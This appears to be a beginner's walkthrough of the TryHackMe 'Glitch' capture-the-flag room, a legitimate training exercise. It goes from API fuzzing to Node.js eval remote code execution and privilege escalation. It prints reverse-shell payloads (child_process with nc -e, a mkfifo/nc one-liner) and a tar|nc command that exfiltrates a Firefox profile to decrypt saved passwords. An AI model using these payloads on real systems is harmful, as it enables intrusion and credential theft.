LINK ROOM: https://tryhackme.com/room/glitch
DIFFICULTY: Easy (but they should consider that room as Medium)
TOOLS USED : Nmap, Gobuster, Burp Suite, wfuzz, firefox_decrypt, doas
This writeup is a bit long. Indeed, I put as many details as I could so any beginner could follow and understand all the concepts. Enjoy your reading!
Let’s start the recon with our old friend nmap:
Here we can say that the room will turn around a website as the port 80 is open.
As this port is open, let’s run already a gobuster to enumerate all the directories:
MANUAL RECON :
Let’s check what is the content of this website. The page is quite empty, and we don’t have a lot of things there… We can check the source code of the page but it is quite empty as well. For curiosity, I also checked the cookies.
Something looks strange here… The website sent me a cookie with the value “value”, which is weird. Ok, let’s keep it in mind!
Gobuster says that there a directory /secret. Let’ check this page and the source code of the page:
Hmm interesting! When we check this endpoint, we have a token. It looks encrypted on base64, let’s decrypt it.
Perfect, we have our first flag and a token !
Most of the time when we talk about token in a web challenge, we talk about cookies. Let’s try to change the value of the cookie with this token:
Cool ! When we put the value (token) that we found and we refresh the page, the page changes.
Let’s go back to the home page to see what happens…
Amazing! The home page changed as well.
Let’s check the page and its source code:
Basically, here the script will take items in the API and show it in the browser. Let’s check those items => http://ipmachine/api/items
We don’t have a lot of information here either. I will be clear with you, I got stuck for a while trying to figure out what is the next step. Finally, I decided to take a hint.
The hint says that we should try another API method.
As a beginner, I never played with API before. So, the only solution was to try to read and learn about API and the way that they work.
Most of the time, an API works with GET, POST, DELETE, and so on. The hint says that we need to play around with those methods.
In order to change the method, I used Burp.
First let’s intercept the request.
o Turn Intercept On
o Go to http://ipmachine/api/items
You can see here that the method is GET. Let’s change GET to OPTIONS, to see all the options that we can use with this API endpoint (send what you intercepted to Repeater):
Basically here, we have 3 methods that we can play around with this endpoint: GET, HEAD and POST. We know already the result for GET. We don’t have results for HEAD. Let’s try POST:
Hmm… I think we have something here, right? Someone put intentionally this message there. Maybe we are in the good way.
From here, I needed to read more about APIs and the way that they work. If you are new as me, I will summarize what I learned about it and explain in an easy way:
The basic goal of an API is to communicate with another application. In order, to receive an information we use the method GET. However, if we want to send an information, we will use POST method.
A quick example: let’s say we want to buy a BWM car and we go to a website where contains a search bar and we want to send a request to see all the “BMW” cars that they have in stock. Here in this example, their site communicate with another application to show the stock. The value of our search is “BMW” and the name of the variable is “cars”. The request that we will send to this API will look like this:
Good, we know the structure of the request, but we don’t really know what is the POST request that we need to send. We will need to discover what come after “items?” (the variable “cars” in my example). To find out this we can fuzz this request and see the POST responses. In order to this, I will use wfuzz.
PS: Just to illustrate my example, I will put the value that we expect as “bwm”:
wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt -X POST — hh 45 -u http://IPMACHINE/api/items\?FUZZ\=bwm
· -c: flag is used to show the output in colors
· -z: to specify the payload list.
· — hh 45: When we sent the POST request through burp, we saw that the content length of the “matrix message” was 45. In order to not show anymore this response, I put –hh 45. Basically here, wfuzz will hide all responses containing 45 characters. Indeed, this matrix message doesn’t have any value for us.
· -u: the url that you need to fuzz.
You can see that we found a “cmd” variable that gives us an error 500. Basically, our request will look like this:
Let’s send this new POST request and see the result:
Interesting! We got an error but we have some extra information. The value “bwm” is executed in the eval function. We can also see that they used NodeJS to build the room.
In this part, I got stuck again… So, I told to myself: “Ok this room asks us to find the content of user.txt and root.txt. So, I can suppose that we will, in a certain way, have a RCE somewhere, right? Indeed, it is the only way because it is not possible to ssh in this room.
I tried to google something like API RCE, API reverse shell, etc. I didn’t find anything. Then I tried NodeJS RCE and I found this writeup.
Here CurlS explains the way that she got a reverse shell playing around an API. So I tried sending a new POST request with her payload (you need to open a listener on your machine first):
POST REQUEST => /api/items?cmd=require(“child_process”).exec(‘nc+IPOFYOURMACHINE+4445+-e+/bin/sh’)
When we send this payload, we got this message: “Vulnerability_exploited”
Hmm… it looks very good! However, nothing happened to my listener. It looks like the payload didn’t really work but the website says that we exploited the vulnerability. Really weird, right?
Let’s find out what is the problem with this payload. We can see that we tried to use a simple Ncat payload. Maybe we can try to use another one. So, I searched for a different payload in this cheatsheet.
There I found one that works. We can use the Netcat OpenBsd:
PAYLOAD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IPOFYOURMACHINE 4445 >/tmp/f
The POST request will be:
Finally, we got a shell!
This shell is a bit ugly, let’s change it => python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
Let’s find user.txt file. Most of the time, we can find this file in the home directory of the user. Let’s check there first:
Perfect, we just found the second flag. Now we need to find a way to escalate the privilege to get root and then read the file root.txt.
When we visit the home folder, we can see that there is another user: v0id. Let’s check what he has in his folder:
Nothing interesting here…
Let’s list all the users:
We can see here that we have 3 users that we could exploit: user (we exploited already), v0id and root.
Our goal now is to find a way to escalate our privilege:
· horizontally (to v0id)
· vertically (to root).
First, let’s try “sudo -l”… It doesn’t work. We need to find another way.
Let’s go back to the user’s home directory and check what is inside:
There is a .firefox directory hidden there. Basically, this directory could contain passwords saved on Firefox Browser. Maybe we can try to find something there.
A few months ago, I read that it is possible to decrypt the content of this file. Let’s transfer this folder .firefox to our machine then decrypt it.
In the target machine, connect back to your machine. In order to do that, go to the /home/user/.firefox then connect back to your machine from there. This will give you access (in your machine) to all the content of .firefox directory.
In the ROOM Machine:
tar cf — .firefox/ | nc IPOFYOURMACHINE 5555
In order to find all the hidden information in this directory, we can use a script created by unode => Link GitHub
Clone this script to your machine:
Now let’s decrypt the b5w4643p.default-release file:
Hmm interesting! Here we can see that the user v0id used this password on the glitch.thm website. Maybe he uses the same password to login in his linux machine? Let’s try to switch to his user:
Good, we just escalated (horizontally) the privileges to v0id user. Now let’s find a way to escalate the privilege (vertically) to the root user.
Let’s check the basic things (as it is an “easy” room) such as: sudo -l, cron jobs, etc/shadow, etc… Nothing special there. I also run linpeas to check if there is something interesting, but I couldn’t find anything. I got stuck here for a while…
Let’s take the last hint of the room: My friend says that sudo is bloat.
I didn’t have any idea what it means, so I googled it and I found this video :
Sudo Is Bloat. Use Doas Instead => Link of the YouTube Video
Basically, doas is a kind of sudo. As we want to have a root shell, we need to execute a command like: sudo -u root /bin/bash. However, if you try with sudo, it doesn’t work.
In the video, it says that we can use doas instead of sudo. So let’s try it:
Wooow! Finally, we got root. Let’s check the root.txt, most of the time this file is in root folder.
After several hours of trying and error, we finally got the third and last flag! It was not easy at all for me. I needed to search a lot and read a lot. However, I learned a lot!
Things that we could learn during this room:
· How API works
· Fuzz an URL with wfuzz
· RCE through NodeJS
· Find passwords hidden on Firefox folder.
· Another alternative for sudo (doas)
In my option, they should change the difficulty of this room. Most of the concepts that we saw during this writeup are not really for beginners. They should change the difficulty to medium (intermediate).
I hope that my writeup helped you to understand better all the aspects of this CTF. If you want to read more writeups like this one or have any question, you can find me on twitter @dropn0w
Stay safe and keep learning!